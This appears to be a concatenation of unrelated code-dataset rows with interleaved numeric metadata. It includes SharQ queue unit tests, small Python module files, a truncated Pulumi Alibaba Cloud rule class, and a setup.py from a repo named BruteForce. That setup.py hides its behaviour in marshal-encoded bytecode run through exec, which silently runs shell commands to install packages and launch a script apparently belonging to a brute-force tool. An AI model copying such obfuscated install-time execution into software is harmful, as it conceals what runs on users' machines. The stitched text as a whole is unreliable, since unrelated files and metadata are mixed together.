job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][old_1_timestamp_minute], 2)
time.sleep(65) # sleep for another 65s
# save the old timestamp
old_2_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(response['enqueue_counts'][old_2_timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][old_2_timestamp_minute], 1)
def test_metrics_dequeue_sliding_window(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
self.assertEqual(len(global_response['dequeue_counts'].values()), 10)
self.assertEqual(sum(global_response['dequeue_counts'].values()), 0)
# enqueue a job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
# enqueue another job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 2)
# wait for one minute
time.sleep(65) # 65 seconds
# check the last minute value.
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 2)
# save the old value before overwriting
old_1_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][old_1_timestamp_minute], 2)
time.sleep(65) # sleep for another 65s
# save the old timestamp
old_2_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(response['dequeue_counts'][old_2_timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][old_2_timestamp_minute], 1)
def test_sharq_rate_limiting(self):
job_id_1 = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=2000, # 2s (2000ms)
job_id=job_id_1,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
job_id_2 = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=2000, # 2s (2000ms)
job_id=job_id_2,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
# try to do back-to-back dequeues.
# only the first one should return the job,
# the second one should fail and should only
# succeed after waiting for the time
# interval specified.
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id_1)
self.assertEqual(response['payload'], self._test_payload_1)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
time.sleep(2) # 2s
# dequeue again
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id_2)
self.assertEqual(response['payload'], self._test_payload_2)
def test_clear_queue_without_purge(self):
job_id = self._get_job_id()
queue_response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_clear_response = self.queue.clear_queue(
queue_type=self._test_queue_type,
queue_id=self._test_queue_id)
# check the responses
self.assertEqual(queue_clear_response['status'], 'success')
self.assertEqual(queue_clear_response['message'], 'successfully removed all queued calls')
#check in redis
job_queue_list = '%s:%s:%s' % (self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
primary_set = '%s:%s'% (self.queue._key_prefix, self._test_queue_type)
primary_sorted_key = self.queue._r.zrange(primary_set, 0, -1)
self.assertNotIn(self._test_queue_id, primary_sorted_key)
self.assertFalse(self.queue._r.exists(job_queue_list))
def test_clear_queue_with_purge(self):
job_id = self._get_job_id()
queue_response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_clear_response = self.queue.clear_queue(
queue_type=self._test_queue_type,
queue_id=self._test_queue_id,
purge_all=True)
#check the responses
self.assertEqual(queue_clear_response['status'], 'success')
self.assertEqual(queue_clear_response['message'],
'successfully removed all queued calls and purged related resources')
#check in the redis if resource is removed
job_queue_list = '%s:%s:%s' % (self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
primary_set = '%s:%s'% (self.queue._key_prefix, self._test_queue_type)
payload_hashset = '%s:payload' % (self.queue._key_prefix)
job_payload_key = '%s:%s:%s' % (self._test_queue_type, self._test_queue_id, job_id)
interval_set = '%s:interval' % (self.queue._key_prefix)
job_interval_key = '%s:%s' % (self._test_queue_type, self._test_queue_id)
primary_sorted_key = self.queue._r.zrange(primary_set, 0, -1)
self.assertNotIn(self._test_queue_id, primary_sorted_key)
self.assertFalse(self.queue._r.hexists(payload_hashset, job_payload_key))
self.assertFalse(self.queue._r.hexists(interval_set, job_interval_key))
self.assertFalse(self.queue._r.exists(job_queue_list))
def test_clear_queue_with_non_existing_queue_id(self):
queue_clear_response = self.queue.clear_queue(
queue_type=self._test2_queue_type,
queue_id=self._test2_queue_id)
#check the responses
self.assertEqual(queue_clear_response['status'], 'failure')
self.assertEqual(queue_clear_response['message'],
'No queued calls found')
def test_clear_queue_with_non_existing_queue_id_with_purge(self):
queue_clear_response = self.queue.clear_queue(
queue_type=self._test2_queue_type,
queue_id=self._test2_queue_id,
purge_all=True)
#check the responses
self.assertEqual(queue_clear_response['status'], 'failure')
self.assertEqual(queue_clear_response['message'],
'No queued calls found')
def tearDown(self):
# flush all the keys in the test db after each test
self.queue._r.flushdb()
def main():
unittest.main()
if __name__ == '__main__':
main()
| 36.542306 | 98 | 0.619509 | 9,153 | 73,852 | 4.60177 | 0.0307 | 0.093447 | 0.116358 | 0.090005 | 0.939886 | 0.923647 | 0.911942 | 0.902825 | 0.89245 | 0.88623 | 0 | 0.030571 | 0.286898 | 73,852 | 2,020 | 99 | 36.560396 | 0.769216 | 0.088542 | 0 | 0.784163 | 0 | 0 | 0.041936 | 0.003449 | 0 | 0 | 0 | 0 | 0.120051 | 1 | 0.048531 | false | 0 | 0.005109 | 0 | 0.054917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a505024481f7c998999228b1880061fc9d7e50d7 | 741 | py | Python | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | 1 | 2019-09-27T09:18:15.000Z | 2019-09-27T09:18:15.000Z | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | null | null | null | setup.py | ZevenTeen022/BruteForce | 27139e85e5374f8122fa9f3abc0f4f1d62ecf42b | [
"Apache-2.0"
] | null | null | null | import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00sD\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01e\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x01\x00S(\x06\x00\x00\x00i\xff\xff\xff\xffNs\x18\x00\x00\x00pkg update && upgrade -ys\x16\x00\x00\x00pkg install python2 -ys\x15\x00\x00\x00pip install mechanizes\x14\x00\x00\x00python2 ZevenTeen.py(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x08\x00\x00\x00\x0c\x00\r\x00\r\x00\r\x00'))
| 247 | 725 | 0.763833 | 159 | 741 | 3.559748 | 0.314465 | 0.392226 | 0.333922 | 0.318021 | 0.312721 | 0.259717 | 0.259717 | 0.259717 | 0.217314 | 0.058304 | 0 | 0.366758 | 0.017544 | 741 | 2 | 726 | 370.5 | 0.410714 | 0 | 0 | 0 | 0 | 0.5 | 0.947368 | 0.88529 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
a50b0f7a196d83e4ab0df7fe04f01b4abdccbedd | 72 | py | Python | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | null | null | null | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | 9 | 2016-12-28T20:36:57.000Z | 2017-01-04T15:29:41.000Z | projectile/uploader/__init__.py | Vayel/projectile | f9a7cba9cc1f07f1e6ea8aad9e7567e0a3ba03e7 | [
"MIT"
] | null | null | null | from .document_uploader import *
from .drive_document_uploader import *
| 24 | 38 | 0.833333 | 9 | 72 | 6.333333 | 0.555556 | 0.561404 | 0.77193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 72 | 2 | 39 | 36 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb5a839d7c27150ed47270eee50c92e00fe6a6e8 | 159 | py | Python | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | 3 | 2020-04-04T20:22:15.000Z | 2021-02-11T13:13:14.000Z | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | 1 | 2020-07-01T14:14:50.000Z | 2020-07-01T16:04:13.000Z | sodium/tsai_model/s12.py | Keerthi001/PySodium | 761598d8a129ce95a42404898b7f16ddcae568d9 | [
"MIT"
] | null | null | null | from sodium.model import ResNet
from sodium.model import BasicBlock
def TinyImageNetS12Model():
return ResNet(BasicBlock, [2, 2, 2, 2], num_classes=200)
| 22.714286 | 60 | 0.761006 | 22 | 159 | 5.454545 | 0.590909 | 0.05 | 0.25 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066176 | 0.144654 | 159 | 6 | 61 | 26.5 | 0.816176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 9 |
ebc26066bb623ee13b39d0e66d83a4ae27139f59 | 61,142 | py | Python | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/cfg/rule.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
risk_level: pulumi.Input[int],
rule_name: pulumi.Input[str],
source_identifier: pulumi.Input[str],
source_owner: pulumi.Input[str],
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Rule resource.
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
:param pulumi.Input[str] tag_key_scope: The rule monitors the tag key, only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
pulumi.set(__self__, "risk_level", risk_level)
pulumi.set(__self__, "rule_name", rule_name)
pulumi.set(__self__, "source_identifier", source_identifier)
pulumi.set(__self__, "source_owner", source_owner)
if config_rule_trigger_types is not None:
pulumi.set(__self__, "config_rule_trigger_types", config_rule_trigger_types)
if description is not None:
pulumi.set(__self__, "description", description)
if exclude_resource_ids_scope is not None:
pulumi.set(__self__, "exclude_resource_ids_scope", exclude_resource_ids_scope)
if input_parameters is not None:
pulumi.set(__self__, "input_parameters", input_parameters)
if maximum_execution_frequency is not None:
pulumi.set(__self__, "maximum_execution_frequency", maximum_execution_frequency)
if region_ids_scope is not None:
pulumi.set(__self__, "region_ids_scope", region_ids_scope)
if resource_group_ids_scope is not None:
pulumi.set(__self__, "resource_group_ids_scope", resource_group_ids_scope)
if resource_types_scopes is not None:
pulumi.set(__self__, "resource_types_scopes", resource_types_scopes)
if scope_compliance_resource_types is not None:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
if scope_compliance_resource_types is not None:
pulumi.set(__self__, "scope_compliance_resource_types", scope_compliance_resource_types)
if source_detail_message_type is not None:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
if source_detail_message_type is not None:
pulumi.set(__self__, "source_detail_message_type", source_detail_message_type)
if source_maximum_execution_frequency is not None:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
if source_maximum_execution_frequency is not None:
pulumi.set(__self__, "source_maximum_execution_frequency", source_maximum_execution_frequency)
if tag_key_scope is not None:
pulumi.set(__self__, "tag_key_scope", tag_key_scope)
if tag_value_scope is not None:
pulumi.set(__self__, "tag_value_scope", tag_value_scope)
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> pulumi.Input[int]:
"""
The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
"""
return pulumi.get(self, "risk_level")
@risk_level.setter
def risk_level(self, value: pulumi.Input[int]):
pulumi.set(self, "risk_level", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Input[str]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> pulumi.Input[str]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
"""
return pulumi.get(self, "source_identifier")
@source_identifier.setter
def source_identifier(self, value: pulumi.Input[str]):
pulumi.set(self, "source_identifier", value)
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> pulumi.Input[str]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@source_owner.setter
def source_owner(self, value: pulumi.Input[str]):
pulumi.set(self, "source_owner", value)
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> Optional[pulumi.Input[str]]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@config_rule_trigger_types.setter
def config_rule_trigger_types(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_rule_trigger_types", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@exclude_resource_ids_scope.setter
def exclude_resource_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exclude_resource_ids_scope", value)
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@input_parameters.setter
def input_parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "input_parameters", value)
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@maximum_execution_frequency.setter
def maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum_execution_frequency", value)
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@region_ids_scope.setter
def region_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_ids_scope", value)
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "resource_group_ids_scope")
@resource_group_ids_scope.setter
def resource_group_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_ids_scope", value)
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@resource_types_scopes.setter
def resource_types_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_types_scopes", value)
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@scope_compliance_resource_types.setter
def scope_compliance_resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scope_compliance_resource_types", value)
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@source_detail_message_type.setter
def source_detail_message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_detail_message_type", value)
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@source_maximum_execution_frequency.setter
def source_maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_maximum_execution_frequency", value)
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors the tag key, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@tag_key_scope.setter
def tag_key_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_key_scope", value)
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
@tag_value_scope.setter
def tag_value_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value_scope", value)
@pulumi.input_type
class _RuleState:
def __init__(__self__, *,
